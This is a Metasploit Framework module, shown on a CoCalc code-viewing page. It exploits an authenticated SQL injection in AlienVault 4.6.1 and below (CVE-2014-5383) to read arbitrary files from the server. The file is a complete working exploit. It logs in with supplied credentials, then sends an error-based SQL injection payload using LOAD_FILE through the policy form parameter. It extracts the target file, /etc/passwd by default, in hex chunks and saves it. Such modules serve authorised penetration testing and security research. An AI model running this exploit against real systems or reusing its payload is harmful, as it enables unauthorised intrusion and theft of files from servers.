Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
19670 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",

14
        'Description' => %q{

15
          AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against

16
          newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability

17
          to read an arbitrary file from the file system. Any authenticated user is able to exploit

18
          this, as administrator privileges are not required.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Chris Hebert <chrisdhebert[at]gmail.com>'

23
        ],

24
        'References' => [

25
          ['CVE', '2014-5383'],

26
          ['OSVDB', '106815'],

27
          ['EDB', '33317'],

28
          ['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']

29
        ],

30
        'DefaultOptions' => {

31
          'SSL' => true

32
        },

33
        'Privileged' => false,

34
        'DisclosureDate' => '2014-05-09',

35
        'Notes' => {

36
          'Reliability' => UNKNOWN_RELIABILITY,

37
          'Stability' => UNKNOWN_STABILITY,

38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

39
        }

40
      )

41
    )

42


43
    register_options([

44
      Opt::RPORT(443),

45
      OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),

46
      OptString.new('USERNAME', [ true, 'Single username' ]),

47
      OptString.new('PASSWORD', [ true, 'Single password' ]),

48
      OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),

49
      OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])

50
    ])

51
  end

52


53
  def run

54
    print_status("Get a valid session cookie...")

55
    res = send_request_cgi({

56
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')

57
    })

58


59
    unless res && res.code == 200

60
      print_error("Server did not respond in an expected way")

61
      return

62
    end

63


64
    cookie = res.get_cookies

65


66
    if cookie.blank?

67
      print_error("Could not retrieve a cookie")

68
      return

69
    end

70


71
    post = {

72
      'embed' => '',

73
      'bookmark_string' => '',

74
      'user' => datastore['USERNAME'],

75
      'passu' => datastore['PASSWORD'],

76
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])

77
    }

78


79
    print_status("Login...")

80


81
    res = send_request_cgi({

82
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),

83
      'method' => 'POST',

84
      'vars_post' => post,

85
      'cookie' => cookie

86
    })

87


88
    unless res && res.code == 302

89
      print_error("Server did not respond in an expected way")

90
      return

91
    end

92


93
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')

94
      print_error("Authentication failed")

95
      return

96
    end

97


98
    cookie = res.get_cookies

99


100
    if cookie.blank?

101
      print_error("Could not retrieve the authenticated cookie")

102
      return

103
    end

104


105
    i = 0

106
    full = ''

107
    filename = datastore['FILEPATH'].unpack("H*")[0]

108
    left_marker = Rex::Text.rand_text_alpha(6)

109
    right_marker = Rex::Text.rand_text_alpha(6)

110
    sql_true = Rex::Text.rand_text_alpha(6)

111


112
    print_status("Exploiting SQLi...")

113


114
    begin

115
      ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do

116
        loop do

117
          file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)

118
          return if file.nil?

119
          break if file.empty?

120


121
          str = [file].pack("H*")

122
          full << str

123
          vprint_status(str)

124


125
          i = i + 1

126
        end

127
      end

128
    rescue ::Timeout::Error

129
      if full.blank?

130
        print_error("Timeout while exploiting sqli, nothing recovered")

131
      else

132
        print_error("Timeout while exploiting sqli, #{full.length} bytes recovered")

133
      end

134
      return

135
    end

136


137
    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])

138
    print_good("File stored at path: " + path)

139
  end

140


141
  def sqli(left_marker, right_marker, sql_true, i, cookie, filename)

142
    pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"

143
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"

144
    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"

145
    pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"

146


147
    get = {

148
      'insertafter' => pay,

149
      'ctx' => 0

150
    }

151


152
    res = send_request_cgi({

153
      'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),

154
      'cookie' => cookie,

155
      'vars_get' => get

156
    })

157


158
    if res && res.body && res.body =~ /#{left_marker}(.*)#{right_marker}/

159
      return $1

160
    else

161
      print_error("Server did not respond in an expected way")

162
      return nil

163
    end

164
  end

165
end

166


167